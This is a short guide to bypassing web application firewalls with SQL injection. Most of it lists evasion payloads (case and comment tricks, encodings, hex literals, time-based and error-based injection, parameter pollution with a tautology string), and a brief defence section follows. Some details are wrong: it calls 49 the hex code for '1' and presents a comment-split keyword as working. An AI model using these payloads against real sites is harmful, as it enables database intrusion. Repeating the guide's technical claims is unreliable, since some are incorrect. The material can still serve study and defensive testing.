SQL Injection WAF Bypass

TL;DR

Web Application Firewalls (WAFs) try to stop SQL injection attacks. This guide shows common ways attackers bypass these protections, and how to defend against them.

1. Understand the WAF

Before bypassing a WAF, know what you’re up against. Common types include:

• Signature-based: Blocks known attack patterns (e.g., SELECT, UNION).
• Anomaly-based: Learns normal behaviour and flags deviations.
• Behavioural: Similar to anomaly-based but more sophisticated.

Tools like Burp Suite can help identify the WAF vendor and ruleset.

2. Basic Bypass Techniques

1. Case Sensitivity: Some WAFs aren’t case sensitive. Try SeLeCt instead of SELECT.
2. Whitespace Variations: Use multiple spaces, tabs, or newlines.

   SELECT%201 FROM users;

3. Comments: Insert comments to break up keywords.

   SEL/**/ECT 1 FROM users;

4. URL Encoding: Encode characters like spaces and quotes.

   %20 for space, %27 for single quote.

3. Character Encoding Bypass

WAFs often struggle with different character encodings.

1. Double Encoding: Encode a character twice. For example, encode a space as %2520 instead of %20.
2. Unicode Encoding: Use Unicode representations of characters.

   SELECT%u00201 FROM users;

4. Keyword Obfuscation

Hide keywords from the WAF.

1. Concatenation: Split keywords into smaller parts.

   CONCAT('SEL','ECT')

2. String Functions: Use functions like SUBSTRING() or REPLACE() to rebuild keywords.
3. Hex Encoding: Represent characters in hexadecimal format.

   SELECT%20CHAR(49) FROM users;

   (49 is the hex code for '1')

5. Using Alternative SQL Syntax

Some databases support different syntax that might bypass WAF rules.

1. Hexadecimal Literals: Use hexadecimal representations of strings.

   SELECT 0x41 FROM users;

   ('A' in hex)

2. Different Join Types: Try RIGHT JOIN, FULL OUTER JOIN instead of just JOIN.

6. Time-Based Blind SQL Injection

If direct output is blocked, use time delays.

1. MySQL:

   SELECT IF(1=1, SLEEP(5), 0);

2. PostgreSQL:

   SELECT pg_sleep(5);

3. SQL Server:

   WAITFOR DELAY '0:0:5';

7. Error-Based SQL Injection

Force the database to generate an error that reveals information.

1. Invalid Functions: Use functions that don't exist in the target database.
2. Division by Zero:

   SELECT 1/0;

8. WAF Evasion with HTTP Parameter Pollution (HPP)

Send multiple parameters with the same name. The WAF might only inspect one, while the application uses another.

1. Example:

   ?id=1&id=2' OR '1'='1

9. Defending Against SQL Injection

• Prepared Statements (Parameterized Queries): The best defense! Separates data from code.
• Input Validation: Sanitize and validate all user input.
• Least Privilege: Grant database users only the necessary permissions.
• WAF Tuning: Regularly update WAF rules and monitor for false positives/negatives.
• Web Application Firewall (WAF): Use a reputable WAF provider.